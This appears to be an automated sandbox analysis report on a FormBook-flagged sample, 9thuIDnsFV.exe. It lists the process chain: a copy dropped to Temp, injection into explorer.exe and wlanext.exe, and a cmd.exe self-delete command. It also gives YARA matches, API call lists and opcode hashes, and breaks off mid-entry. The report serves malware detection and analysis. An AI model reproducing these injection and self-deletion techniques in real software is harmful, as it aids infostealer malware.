High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 9thuIDnsFV.exe PID: 6324 Parent PID: 6048

General

Start time:	14:04:05
Start date:	22/07/2021
Path:	C:\Users\user\Desktop\9thuIDnsFV.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\9thuIDnsFV.exe'
Imagebase:	0xe80000
File size:	648912 bytes
MD5 hash:	0E715DB2198FF670F4BF0E88E0E9B547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: 9thuIDnsFV.exe PID: 5860 Parent PID: 6324

General

Start time:	14:04:50
Start date:	22/07/2021
Path:	C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe vgyjnbhui
Imagebase:	0xf40000
File size:	648912 bytes
MD5 hash:	0E715DB2198FF670F4BF0E88E0E9B547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 24%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3440 Parent PID: 5860

General

Start time:	14:04:52
Start date:	22/07/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wlanext.exe PID: 4868 Parent PID: 3440

General

Start time:	14:05:19
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wlanext.exe
Imagebase:	0x2b0000
File size:	78848 bytes
MD5 hash:	CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3520 Parent PID: 4868

General

Start time:	14:05:26
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3860 Parent PID: 3520

General

Start time:	14:05:27
Start date:	22/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 9thuIDnsFV.exe PID: 6324 Parent PID: 6048 9thuIDnsFV.exeCOMMON

Executed Functions

Function 0322B707, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0322B768
GetCurrentThread.KERNEL32 ref: 0322B7A5
GetCurrentProcess.KERNEL32 ref: 0322B7E2
GetCurrentThreadId.KERNEL32 ref: 0322B83B

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c31fbd42e2784a06f9025e54491a379d3793ab66938680c78041299b19fa6d3e
Instruction ID: 0a6349e322d343ca135468db6da6e4249835f56ef3acbc7177e0647392bacf8b
Opcode Fuzzy Hash: c31fbd42e2784a06f9025e54491a379d3793ab66938680c78041299b19fa6d3e
Instruction Fuzzy Hash: 355144B49006499FDB14DFA9E988BEEBBF0AF48304F248159E419A7350CB345884CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0322B708, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0322B768
GetCurrentThread.KERNEL32 ref: 0322B7A5
GetCurrentProcess.KERNEL32 ref: 0322B7E2
GetCurrentThreadId.KERNEL32 ref: 0322B83B

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7a801b0f3ff4154bf12417bdc3f61060005620e6e42d0c7b19eab8deca3712a7
Instruction ID: a104a5d07280474dc0d3068334d3e4fbcaccde3d526becb5e69b94ded471e273
Opcode Fuzzy Hash: 7a801b0f3ff4154bf12417bdc3f61060005620e6e42d0c7b19eab8deca3712a7
Instruction Fuzzy Hash: 2C5154B49007499FDB14DFAAE948BAEBFF0EF48314F248059E419AB350CB345884CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0322B6F8, Relevance: 6.1, APIs: 4, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0322B768
GetCurrentThread.KERNEL32 ref: 0322B7A5
GetCurrentProcess.KERNEL32 ref: 0322B7E2
GetCurrentThreadId.KERNEL32 ref: 0322B83B

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2a1b96edd20aed5bba7daef88f89b47abec6ffabfa460431fb08335597a7fdb0
Instruction ID: cb7892ab6f1801b4e2b5cc5cf43820ce13e7940e56c38f924f78d1e9dbb143b1
Opcode Fuzzy Hash: 2a1b96edd20aed5bba7daef88f89b47abec6ffabfa460431fb08335597a7fdb0
Instruction Fuzzy Hash: 245174B49147498FDB10DFA9D8497EEBFF0AF49304F248199D459AB3A1CB345888CF26

Uniqueness

Uniqueness Score: -1.00%

Function 03229410, Relevance: 1.7, APIs: 1, Instructions: 203COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 03229656

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e6b8fc8e20fe1131f9abc6c949a9e52b88dfce39120921379ac6016fc999ac7e
Instruction ID: 415db5a52be85db19b8ec0342d168749807ca4d9e71e8acd9ec1fe336c0943c1
Opcode Fuzzy Hash: e6b8fc8e20fe1131f9abc6c949a9e52b88dfce39120921379ac6016fc999ac7e
Instruction Fuzzy Hash: AC817670A10B159FDB24DF2AD4407AABBF1BF88204F04892ED04ADBA50D774E895CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0322FD78, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0322FE8A

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4232bef18b128838e40b1c391d8d405ddea68a2748bf870e55ec96b3282b0df3
Instruction ID: 68e0e9a9711256ddb66b549377ae4c20cc449975ad32a7fa1b3cb30e39d7497e
Opcode Fuzzy Hash: 4232bef18b128838e40b1c391d8d405ddea68a2748bf870e55ec96b3282b0df3
Instruction Fuzzy Hash: AF41D0B1D10319AFDB15CFAAD980ADEFFB5BF48310F24812AE419AB210D7749885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 032238A8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 03225411

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8c173c9786894921f95303975ec098155237e2f35ee8f7004b8c17fb4ce0abf2
Instruction ID: 77de0cafd825474c956f5d22e4977b9d1d7bef8b52ed0a8a6c25fb413275b10e
Opcode Fuzzy Hash: 8c173c9786894921f95303975ec098155237e2f35ee8f7004b8c17fb4ce0abf2
Instruction Fuzzy Hash: B1411271C1462CDFDB24DFAAC844B9DFBB5BF89308F248069D408AB251DBB56985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0322535E, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 03225411

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ecbda282e878f134e0fda5dd1dc0e3ec36889b178a879a236507e75fe5c01d1a
Instruction ID: 75b25252277dfa6642e2db6e24f476082ec88c3746eac61b2de0cb6994e1ffae
Opcode Fuzzy Hash: ecbda282e878f134e0fda5dd1dc0e3ec36889b178a879a236507e75fe5c01d1a
Instruction Fuzzy Hash: 90410271C10228DEDB24DFAAC884BDDFBB1BF89308F248069D408AB251DBB45985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0322B930, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0322B9B7

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8ec7da4a68db8dea936f7cbac61ef87fc087fc74df6ffca2d0c4457f5285f99a
Instruction ID: 95474810b3dc6f96edfcf757e6fb1dbb85b986e101e991de01e2887edfd33b60
Opcode Fuzzy Hash: 8ec7da4a68db8dea936f7cbac61ef87fc087fc74df6ffca2d0c4457f5285f99a
Instruction Fuzzy Hash: 2321C4B5900219EFDB10DFAAD984ADEBFF4EF48324F14841AE954A7310D774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03228970, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,032296D1,00000800,00000000,00000000), ref: 032298E2

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 682dc7433b4edaefb8b88b9bbfeaf9d301f992e8fce3f894a74d3ee6706ce1d9
Instruction ID: 7be76650c84754f78c4781f659d715746181c2abee6ecf30d4d7535144ff1beb
Opcode Fuzzy Hash: 682dc7433b4edaefb8b88b9bbfeaf9d301f992e8fce3f894a74d3ee6706ce1d9
Instruction Fuzzy Hash: A31117B5D043099FCB10DFAAD844ADEFBF4EB48314F14842EE819A7200C774A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 032295F0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 03229656

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e78ad4b0852557d89af2c4afe1c8afa71afcf19e5c1c2719dd283ec0b1fb6248
Instruction ID: 8220bcc3b2cbc831a25c14f53c4140733eb329b653f209db4782f3e19818e2c3
Opcode Fuzzy Hash: e78ad4b0852557d89af2c4afe1c8afa71afcf19e5c1c2719dd283ec0b1fb6248
Instruction Fuzzy Hash: C6110FB5C006498FCB10DFAAD844ADEFBF4AB88224F14841AD429B7600C378A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F9D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.423755323.0000000002F9D000.00000040.00000001.sdmp, Offset: 02F9D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24fc7ac0cc5dfa9510626741ca8fda511ef39acc11144c7c77ddc1cb9a723ff8
Instruction ID: 046c9e9d27027b15eeb9d8f3e62035fa40b7878a3c7531c2858a75f449bbeb92
Opcode Fuzzy Hash: 24fc7ac0cc5dfa9510626741ca8fda511ef39acc11144c7c77ddc1cb9a723ff8
Instruction Fuzzy Hash: 1B21D672A04240DFEF15EF14D9C0B26BB65FB883A8F348569EA054B306C336D856C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02FAD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.423816340.0000000002FAD000.00000040.00000001.sdmp, Offset: 02FAD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc77d6ad42d7b9f2568ebabd921cebe34f42cb481c3075f13a371497210e4c5
Instruction ID: 1ffe7cc35d8bbb0d6d5351f03db0b0c90e4227d6bb20bb9dd90c58d6520bea77
Opcode Fuzzy Hash: dfc77d6ad42d7b9f2568ebabd921cebe34f42cb481c3075f13a371497210e4c5
Instruction Fuzzy Hash: 7B2137B1A08300DFDB14DF24D8D0B26BB65FB88B54F20C569EA0A4B64AC336D807CA61

Uniqueness

Uniqueness Score: -1.00%

Function 02FAD2E4, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.423816340.0000000002FAD000.00000040.00000001.sdmp, Offset: 02FAD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 090dddc1ba0adbb8f1d72d1049e7a8cd815571540146c10770fedc6ca72f8c6f
Instruction ID: 0b9e154045dadec31ba907bf428cf164de699516ff51a5716491c8a3db617f1a
Opcode Fuzzy Hash: 090dddc1ba0adbb8f1d72d1049e7a8cd815571540146c10770fedc6ca72f8c6f
Instruction Fuzzy Hash: C6213AF2A08340DFDB04DF14D9D0B2ABBA9FB847A4F24C56DD6094BA45C376E806C661

Uniqueness

Uniqueness Score: -1.00%

Function 02FAD005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.423816340.0000000002FAD000.00000040.00000001.sdmp, Offset: 02FAD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c601302df38bd9e14e9d6fafe7eecf01fde8970c42a80e0d59588fb8ddcb5ba3
Instruction ID: 320730ca53ea409ccc7e50199230043594b96d620a0660e7108708105838d3b1
Opcode Fuzzy Hash: c601302df38bd9e14e9d6fafe7eecf01fde8970c42a80e0d59588fb8ddcb5ba3
Instruction Fuzzy Hash: C62192755093C08FCB02CF24D5A0715BF71EB46614F28C5DAD8498F657C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 02F9D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.423755323.0000000002F9D000.00000040.00000001.sdmp, Offset: 02F9D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9115780b4585089393e1f7dbbea6238d62ff9af574e0ed9653678d5c21af2e
Instruction ID: c792fb1690e4682170141e1bb2d91d067cc3b013bf96b3b211afa7d30cfc6aa7
Opcode Fuzzy Hash: 1e9115780b4585089393e1f7dbbea6238d62ff9af574e0ed9653678d5c21af2e
Instruction Fuzzy Hash: F011AF76804280CFDF15DF14D5C4B16BF71FB84328F2486A9D9494B616C336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02FAD2DF, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.423816340.0000000002FAD000.00000040.00000001.sdmp, Offset: 02FAD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbcb047edde4e49937a0d0588a98c14fd06b4129e0a579b04b7446288350d27
Instruction ID: d0a2130897e9dc3bec33cd570795e12e795789cc60e1254683e8e28f788de308
Opcode Fuzzy Hash: bfbcb047edde4e49937a0d0588a98c14fd06b4129e0a579b04b7446288350d27
Instruction Fuzzy Hash: 2411E0B6904780CFDB11CF14D5D4B19FBB1FB84224F24C6AAC8484BA56C33AD40ACB92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0322E5F0, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e60ac4845c800b5c07bec1c94bbe540a1de81a425de64840f7d26c7f966c5c
Instruction ID: 8db1367b5f33183be37394b81cc088a555030ee470c900c9c0e797fa1d248c77
Opcode Fuzzy Hash: e4e60ac4845c800b5c07bec1c94bbe540a1de81a425de64840f7d26c7f966c5c
Instruction Fuzzy Hash: FA12A5F94117668BD310EF65F99C1893BA1B746328FB0C208D2E12FAD9D7B8514ACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0322C224, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94f587a8760b1b62c766a50ba84db5d5f3ce276f3e3542bb946c470099a60404
Instruction ID: cbe675fd1312f86b94058d151e05cfe63b63aad046b928095212759c4b3dbbfd
Opcode Fuzzy Hash: 94f587a8760b1b62c766a50ba84db5d5f3ce276f3e3542bb946c470099a60404
Instruction Fuzzy Hash: 45A18036E1022A9FCF05DFB5D8449DDBBB2FF84300B15856AE815BB224EB71E945CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0322E5E2, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.424115563.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ecbad00232755d7d3843d2c7a8b746e284d07d85b5e1b2a87e162c7b5e790c1
Instruction ID: a2bff26c27508d1976f7bdc31f87fceef4a1dcbbed67425b9247bae2695730e2
Opcode Fuzzy Hash: 4ecbad00232755d7d3843d2c7a8b746e284d07d85b5e1b2a87e162c7b5e790c1
Instruction Fuzzy Hash: 14C107B94117668BD310EF64F89C1897BB1BB86328F70C309D2A12BAD8D7B4514ACF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 9thuIDnsFV.exe PID: 5860 Parent PID: 6324 9thuIDnsFV.exeCOMMON

Executed Functions

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6cb096611a16804a612f5e9138823f4d198a3533603dc79ebed6b93fff7ce2fd
Instruction ID: 06d018e38814200cb02d6a26a1a33edc8980a6ad0ddc23bb4217092dca9c4eb1
Opcode Fuzzy Hash: 6cb096611a16804a612f5e9138823f4d198a3533603dc79ebed6b93fff7ce2fd
Instruction Fuzzy Hash: 1301EFB6210208ABCB08CF88CC80EEB37A9AF8C714F058648FA0C97241C630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419DB2, Relevance: 1.5, APIs: 1, Instructions: 29filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c8d317cc902a4eb519eb1f160d349baf79fe91cb1dbf8cfc74ffe6a93ece3173
Instruction ID: e45567437886e3e419597d655f0560f9a6f662fc9c7db96566c0a2788184e3c7
Opcode Fuzzy Hash: c8d317cc902a4eb519eb1f160d349baf79fe91cb1dbf8cfc74ffe6a93ece3173
Instruction Fuzzy Hash: FDF022B2214509AF8B48CF9CD890CEB73F9AF8C754B158609FA1DD3244D635EC518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 1361c3fc5f1e5a032bd29a9aa4148b3688cad28c83ad50f3b986b15e37268987
Instruction ID: 40a77689734be908a332ff080f482ba1f35fe0d030979433b87b5ca10dc68e8b
Opcode Fuzzy Hash: 1361c3fc5f1e5a032bd29a9aa4148b3688cad28c83ad50f3b986b15e37268987
Instruction Fuzzy Hash: AFE0C276201200ABE710EB94CCC6EE77B68EF48360F054889F98D9B243C534E5508790

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
